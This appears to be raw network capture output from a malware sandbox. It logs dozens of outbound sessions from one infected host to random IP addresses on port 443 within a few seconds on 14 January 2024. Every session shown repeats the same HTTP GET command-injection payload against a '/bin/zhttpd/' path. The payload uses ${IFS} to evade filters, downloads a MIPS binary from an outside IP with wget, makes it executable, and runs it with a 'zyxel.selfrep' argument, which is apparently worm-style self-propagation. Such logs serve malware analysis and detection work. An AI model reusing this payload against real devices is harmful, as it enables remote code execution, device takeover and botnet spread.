                                      Jan 14, 2024 15:50:12.848819971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      446192.168.2.1439226207.39.136.105443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:12.848891973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      447192.168.2.143870063.239.20.230443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:12.848963976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      448192.168.2.144073464.40.41.247443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:12.849028111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      449192.168.2.1436894145.33.24.103443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:12.849067926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      450192.168.2.145414639.215.112.64443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:12.849131107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      451192.168.2.1459572181.5.187.240443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:12.849184036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      452192.168.2.1451876116.165.85.145443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:12.849277020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      453192.168.2.1447804194.63.19.247443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:12.849323988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      454192.168.2.1440402144.239.46.244443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:12.849401951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      455192.168.2.143394851.198.235.8443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:12.849432945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      456192.168.2.1447920211.50.149.113443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:12.849517107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      457192.168.2.144699052.100.94.44443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:12.849589109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      458192.168.2.1438890153.66.63.222443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:12.849657059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      459192.168.2.143347253.253.188.165443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:12.849710941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      460192.168.2.1436384120.118.180.230443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:12.849780083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      461192.168.2.1443934209.137.170.25443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:13.858320951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      462192.168.2.1452818155.133.121.193443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:13.858385086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      463192.168.2.1442214100.32.137.77443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:13.858478069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      464192.168.2.1459106128.32.138.225443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:15.868756056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      465192.168.2.143798252.35.126.27443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:15.868809938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      466192.168.2.1447866126.193.249.239443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:15.868838072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      467192.168.2.1450374113.9.3.119443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:15.868891001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      468192.168.2.144430677.149.10.240443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:15.869023085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      469192.168.2.144365220.74.222.167443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:16.872939110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      470192.168.2.145574088.9.79.44443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:16.872977018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      471192.168.2.14421469.161.84.26443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:16.872980118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      472192.168.2.1456006131.130.99.1443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:16.873017073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      473192.168.2.1455434204.218.138.26443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:16.873111010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      474192.168.2.1433420220.211.57.184443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:17.877827883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      475192.168.2.1457530168.142.60.12443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:17.877899885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      476192.168.2.145963073.65.37.160443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:17.877932072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      477192.168.2.145863435.99.67.17443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:17.878026009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      478192.168.2.1442918106.183.81.116443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:18.881654024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      479192.168.2.144614817.228.220.154443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:18.881694078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      480192.168.2.1460292180.183.199.96443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:18.881735086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      481192.168.2.144837264.157.112.53443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:18.881791115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      482192.168.2.1444946189.172.87.133443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:19.888096094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      483192.168.2.1439540124.200.75.36443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:19.888187885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      484192.168.2.1450128106.181.39.141443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:19.888236046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      485192.168.2.1457002145.180.182.212443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:19.888370991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      486192.168.2.1457572194.249.123.255443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:20.892913103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      487192.168.2.145309670.195.173.130443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:20.892981052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      488192.168.2.1458930189.246.8.180443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:20.893048048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      489192.168.2.145372099.25.236.47443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:20.893075943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      490192.168.2.145015682.16.126.48443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:20.893111944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      491192.168.2.144504467.250.250.100443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:21.897196054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      492192.168.2.145228647.208.104.83443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:21.897249937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      493192.168.2.144106082.185.70.37443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:21.897288084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      494192.168.2.1447074191.65.218.130443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:21.897336006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      495192.168.2.143517836.133.240.222443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:21.897459984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      496192.168.2.145856086.176.64.105443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:21.897525072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      497192.168.2.145982863.80.110.39443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:22.901773930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      498192.168.2.1441176113.23.247.62443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:22.901817083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      499192.168.2.144190413.156.239.215443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:23.906445980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      500192.168.2.1438778134.0.237.99443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:25.918255091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      501192.168.2.1437608154.237.89.63443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:25.918298960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      502192.168.2.145002041.48.202.240443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:25.918360949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      503192.168.2.145254046.183.181.187443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:25.918416023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      504192.168.2.1455454113.104.91.153443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:25.918472052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      505192.168.2.1437882208.240.31.246443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:25.918587923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      506192.168.2.1437938206.183.123.199443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:26.923886061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      507192.168.2.1459086114.136.246.70443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:26.923913956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      508192.168.2.1443528223.68.112.222443
                                      TimestampBytes transferredDirectionData
